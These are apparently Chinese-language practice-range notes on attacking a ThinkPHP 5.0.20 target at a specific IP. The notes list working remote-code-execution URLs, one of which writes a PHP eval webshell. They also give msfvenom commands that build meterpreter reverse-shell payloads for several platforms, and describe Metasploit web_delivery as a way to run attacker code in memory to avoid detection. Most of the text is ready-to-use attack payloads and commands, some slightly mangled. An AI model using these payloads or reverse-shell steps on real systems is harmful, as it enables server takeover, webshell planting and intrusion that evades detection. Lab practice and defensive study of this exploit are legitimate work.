靶场:Thinkphp 5.0.20
漏洞利用payload:
http://150.158.137.72:8081/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&
vars[1][]=whoami
http://150.158.137.72:8081/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_p
ut_contents&vars[1][]=shell.php&vars[1][]=%3C?php%20@eval($_POST[ccc]);?%3E
http://150.158.137.72:8081/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
shell.php访问成功
view-source:150.158.137.72:8081/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat shell.php
访问index.php
view-source:150.158.137.72:8081/index.php
访问shell.php
菜刀连接
MSF生成木马攻击上线webshell
生成可执行文件
linux:
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=<you host>-p
<you port>-f elf -o muma.elf
php:
msfvenom-p php/meterpreter/reverse_tcp LHOST=<YourIPAddress>LPORT=<Your Port to
Connect On>-f raw >shell php
asp:
msfvenom -a x86 -platform windows -p windows/meterpreter/reverse_tcp LHOST=<Your IP
Address>LPORT=<Your Port to Connect On>-f aspx - o shell.aspx
jsp:
msfvenom -p java/jsp_shell reverse_tcp LHOST=<Your IPAddress>LPORT=<Your Port to
Connect On>-fraw >shell jsp
war:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IPAddress>LPORT=<Your Port to
Connect On>-f war >shell.war
纯文本
将文件上传到webshell服务器
赋予执行权限
执行木马
上线到msf、
利用python生成交互式shell
反弹shell ——直接访问就可以执行 上线到msf
php: msfvenom-p php/meterpreter/reverse_tcp LHOST= <Your IP Address> LPORT= <Your Port to Connect On> -f raw >shell php asp: msfvenom -a x86 -platform windows -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT= <Your Port to Connect On> -f aspx - o shell.aspx jsp: msfvenom -p java/jsp_shell reverse_tcp LHOST=<Your IP Address> LPORT= <Your Port to Connect On> -fraw >shell jsp war: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT= <Your Port to Connect On> -f war > shell.war
WEB_delivery上线到msf
当攻击者拥有部分受害者主机的控制权,但还没有拿到一个完整的shell时, web_delivery就派上用场
① web_delivery的主要目的是快速和受害者主机建立一条session.当受害者主机存在比如命令注入、远程命令执行等问题时,攻击者可以使用web_delivery生成的一条命令建立连接。
②另外web_delivery的payload不会在受害者主机磁盘上写文件,而是直接将攻击者服务器上的代码加载到内存执行,有利于绕过检测。
③ web_delivery支持php/python/powershell等多种脚本,使用不同的脚本的payload时需要通过set target 0或1或2来设置是使用php还是python还是powershell等。
search web_delivery
http://150.158.137.72:8081/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=msf生成的payload(php -d all)